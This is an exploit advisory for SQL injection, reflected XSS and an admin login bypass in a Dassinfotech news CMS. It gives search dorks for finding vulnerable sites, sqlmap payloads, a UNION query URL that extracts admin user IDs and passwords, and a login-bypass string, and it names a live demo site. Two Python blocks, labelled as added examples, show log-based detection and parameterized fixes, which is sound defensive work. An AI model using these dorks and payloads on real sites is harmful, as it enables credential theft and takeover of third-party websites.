+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+ Exploit Title: News website CMS SQL injection & Bypass Admin Panel & XSS Vulnerability By Aryan Chehreghani
+ Date: 2020-06-05
+ Vendor Homepage: https://www.dassinfotech.com
+ Auxiliary software: http://sqlmap.org
+ Exploit Author: Aryan Chehreghani | Ictus_TM
+ Dork CVE: CVE-2019-13409
+ Dork CWE: CWE-89
+ Version: All Versions
+ Tested on: win, linux, mac
###########################################################################################################################
+ Dork 1 : intext:Design by Dassinfotech.com
+ Dork 2 : inurl:detailsnews.php?id=
+ Dork 3 : intext:Design by Dassinfotech.com inurl:detailsnews.php?id=
+ Dork 4 : inurl:php?id= intext:Design By Dassinfotech.com
###########################################################################################################################
[SQL injection]
[+] Method (SQL injection): Ictus Security Team of Iran
[+] Parameter: catid (GET), e.g. latestnews.php?catid=25
###########################################################################################################################
[+] Testing Method:
[+] - UNION query
__________SQLMAP__________ result:
Parameter: catid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: catid=15' AND 6574=6574 AND 'RCcd'='RCcd

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: catid=15' AND (SELECT 9314 FROM (SELECT(SLEEP(5)))mkCY) AND 'rCId'='rCId

    Type: UNION query
    Title: Generic UNION query (NULL) - 19 columns
    Payload: catid=15' UNION ALL SELECT CONCAT(0x716b767171,0x6c746c51566743754d72706e67777068776f58415443736f62786f4d716448795a6b56744f664a61,0x716a6a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++|
[+] Using sqlmap, example: sqlmap -u "http://target.com/latestnews.php?catid=25" --dbs
========================================================================|
Exploit ==>
latestnews.php?catid=-23%27%20union%20select%201,2,3,4,5,6,7,group_concat(userid,Password),9,10,11,12,13,14,15,16,17,18,19%20fRom%20admin--%20-
========================================================================|
Demo:
[+] http://ncrlife.in/latestnews.php?catid=25[SQL]
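From the defender's side, the requests above leave a recognisable trail in the web server's access log. The following is an added example, not part of this advisory: a small Python checker that URL-decodes each query string from Apache-style "combined" log lines and flags the patterns shown in the sqlmap output and the exploit URL (UNION ... SELECT, SLEEP(), a quote followed by an AND/OR tautology, SQL comment terminators), plus the sqlmap User-Agent string. The log lines, addresses, timestamps and sizes are constructed for the demonstration; the query payloads in them are the ones shown above.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache "combined" log lines modelled on the requests in this advisory.
# Client address, timestamps and response sizes are made up; this is not real traffic.
SAMPLE_LOG = """\
203.0.113.10 - - [05/Jun/2020:10:00:01 +0000] "GET /latestnews.php?catid=25 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.10 - - [05/Jun/2020:10:00:02 +0000] "GET /latestnews.php?catid=15%27%20AND%206574%3D6574%20AND%20%27RCcd%27%3D%27RCcd HTTP/1.1" 200 5120 "-" "sqlmap/1.4.6#stable (http://sqlmap.org)"
203.0.113.10 - - [05/Jun/2020:10:00:03 +0000] "GET /latestnews.php?catid=-23%27%20union%20select%201,2,3,4,5,6,7,group_concat(userid,Password),9,10,11,12,13,14,15,16,17,18,19%20fRom%20admin--%20- HTTP/1.1" 200 7010 "-" "Mozilla/5.0"
203.0.113.10 - - [05/Jun/2020:10:00:04 +0000] "GET /detailsnews.php?id=7 HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
"""

# Apache/nginx "combined" format: ip ident user [time] "METHOD target PROTO" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Signatures matched against each *decoded* query-string value. Each rule
# corresponds to one technique visible in the advisory's sqlmap output.
RULES = [
    ("union-select", re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I)),
    ("time-based-sleep", re.compile(r"\bsleep\s*\(", re.I)),
    # a closing quote followed by AND/OR and an x=y comparison (boolean-based blind probes)
    ("tautology", re.compile(r"'\s*(?:and|or)\s+\S+\s*=\s*\S+", re.I)),
    # SQL comment used to discard the rest of the original query
    ("sql-comment", re.compile(r"--[\s-]|/\*")),
]


def decode_params(target: str):
    """Split the request target into decoded (name, value) pairs."""
    query = urlsplit(target).query
    return parse_qsl(query, keep_blank_values=True)


def analyze_log(text: str) -> dict:
    """Return {line_number: [rule names]} for every log line that trips a rule."""
    findings = {}
    for number, line in enumerate(text.splitlines(), 1):
        match = LOG_RE.match(line)
        if not match:
            continue  # skip lines that are not in combined format
        hits = set()
        if "sqlmap" in match["ua"].lower():
            hits.add("sqlmap-user-agent")
        for _name, value in decode_params(match["target"]):
            for rule, pattern in RULES:
                if pattern.search(value):
                    hits.add(rule)
        if hits:
            findings[number] = sorted(hits)
    return findings


if __name__ == "__main__":
    for number, rules in analyze_log(SAMPLE_LOG).items():
        print(f"line {number}: {', '.join(rules)}")
```

Matching on the decoded value matters: the exploit URL is percent-encoded and mixed-case (`%27%20union%20select ... fRom`), so a raw, case-sensitive substring search on the log line would miss it. Note that the admin-panel payload below travels in a POST body, which a standard access log does not record, so it needs application-side logging rather than this checker.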
========================================================================|
[XSS Vulnerability]
[+] Method :"><script>alert('Aryan Chehreghani | Ictus_TM')</script><"
[+] Enter the code in the search field or any other reflected input value
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[Bypass Admin panel]
[+] Payload U / P : '=''or' / '=''or'
[+] Login Pages: victim.com/matri/login.php victim.com/india/login.php
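All three findings in this advisory (the catid injection in latestnews.php, the reflected XSS in the search value, and the `'=''or'` login bypass) come from the same root cause: untrusted request values spliced into SQL text or HTML without parameterisation or encoding. The following is an added example, not code from this advisory or from the vendor's CMS: a Python/sqlite3 model of the three affected handlers written the way a defender would fix them. The table and column names, the demo credentials and the constructed XSS string are assumptions; the SQL payloads fed to it are the ones shown above.

```python
import hashlib
import hmac
import os
import sqlite3
from html import escape

PBKDF2_ROUNDS = 100_000  # assumption for the demo; tune to your hardware


def _hash_password(password: str, salt: bytes) -> bytes:
    """Salted PBKDF2-HMAC-SHA256; the CMS must never store plaintext passwords."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ROUNDS)


def build_demo_db() -> sqlite3.Connection:
    """In-memory stand-in for the CMS database (schema and rows are constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (userid TEXT PRIMARY KEY, salt BLOB, pwhash BLOB)")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, catid INTEGER, title TEXT)")
    salt = os.urandom(16)
    conn.execute("INSERT INTO admin VALUES (?, ?, ?)",
                 ("admin", salt, _hash_password("correct horse", salt)))
    conn.executemany("INSERT INTO news (catid, title) VALUES (?, ?)",
                     [(25, "Town hall opens"), (25, "Road closed"), (7, "Weather")])
    conn.commit()
    return conn


def latest_news(conn: sqlite3.Connection, catid_raw: str) -> list:
    """latestnews.php?catid=... : validate the type, then bind the value."""
    try:
        catid = int(catid_raw)          # anything that is not an integer never reaches SQL
    except ValueError:
        return []
    rows = conn.execute("SELECT title FROM news WHERE catid = ? ORDER BY id DESC", (catid,))
    return [title for (title,) in rows]


def login(conn: sqlite3.Connection, userid: str, password: str) -> bool:
    """login.php : bound parameter for the lookup, hash comparison for the password."""
    row = conn.execute("SELECT salt, pwhash FROM admin WHERE userid = ?", (userid,)).fetchone()
    if row is None:
        _hash_password(password, b"\x00" * 16)   # burn the same time for unknown users
        return False
    salt, stored = row
    return hmac.compare_digest(_hash_password(password, salt), stored)


def render_search_box(value: str) -> str:
    """Reflect the search value into HTML only after attribute-safe encoding."""
    return '<input type="text" name="search" value="%s">' % escape(value, quote=True)


if __name__ == "__main__":
    db = build_demo_db()
    print(latest_news(db, "25"))
    print(latest_news(db, "-23' union select 1,2,3 fRom admin-- -"))   # payload from the advisory
    print(login(db, "admin", "correct horse"))
    print(login(db, "'=''or'", "'=''or'"))                            # bypass payload from the advisory
    print(render_search_box('"><script>alert(1)</script><"'))         # constructed XSS string
```

With the catid bound as a parameter (and type-checked first), the UNION payload is just a string that matches no row; with the credential check done as a bound lookup plus a constant-time hash comparison, the `'=''or'` payload is a username that does not exist rather than a boolean expression the database evaluates; and `escape(..., quote=True)` turns the `"` and `<` in the search value into entities, so the reflected value cannot close the attribute or open a script tag.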
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[=] T.me/Clvsornapv
[=] Telegram Channel ==> T.me/Ictus_TM